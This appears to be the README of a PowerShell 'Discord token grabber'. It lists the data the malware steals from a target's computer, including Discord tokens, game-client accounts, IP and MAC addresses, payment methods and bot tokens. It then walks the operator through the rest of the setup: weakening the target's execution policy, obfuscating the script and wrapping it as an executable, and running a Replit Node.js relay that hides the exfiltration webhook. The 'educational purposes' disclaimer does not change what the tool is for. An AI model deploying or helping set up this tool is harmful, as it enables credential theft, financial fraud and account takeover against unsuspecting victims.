This Powerful Discord Token grabber made in powershell grabs the following informations on the target computer
Discord Tokens(from every browser or discord desktop applications)
Public IP Address
Local IP Addresses(IPv4 and IPv6)
MAC Address
UUID
GUID
CPU
PC Username
OS name
Virtual machine detection
Minecraft Launcher Accounts
Rusherhack alts and waypoints
Konas alts and waypoints
Future alts and waypoints
Remix UID
Remix alts
Pyro client username
Pyro hashed password
The target must have his execution policy set to unrestricted
Set-ExecutionPolicy -Scope Localmachine -ExecutionPolicy Unrestricted
if Mel says so, than it means its true
Open the clientfile.ps1 and put your replit/glitch API URL and you can obfuscate it with this Powershell obfuscator and wrap it to an executable with this Powershell wrapper
Here is a list of steps to follow to setup this simple NodeJS server to hide the webhook from the payload script
- Go on Replit and create an account if it's not already done
- Click on the context menu and click "+ Create"
- Choose Node.js and input a name for your repository
- Go in the "Shell" section at the right side and enter the following command
npm i express body-parser v11-discord.js sync-request
- Copy paste the content of the serverfile.js in the index.js
- Put your webhook in the webhook variable(var webhook = "you put it here")
- Press run and everything should be ready
- Copy the link that appeared on the top right in the clientfile.ps1($api = "you put it here")
- Be sure to try it to ensure that its working
I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THIS GRABBER. THIS IS ONLY FOR EDUCATIONAL PURPOSES
Serverfile.js blatantly skidded from my boi Fubukii
Regex matching part stolen from Batched
Rare Friends Info
Payment Methods(full list in separated embeds)
Connections(full list in separated embeds)
Applications(Only Bot ID, Client Key, Public Key and Bot Tokens)
Injection
MultiMc finder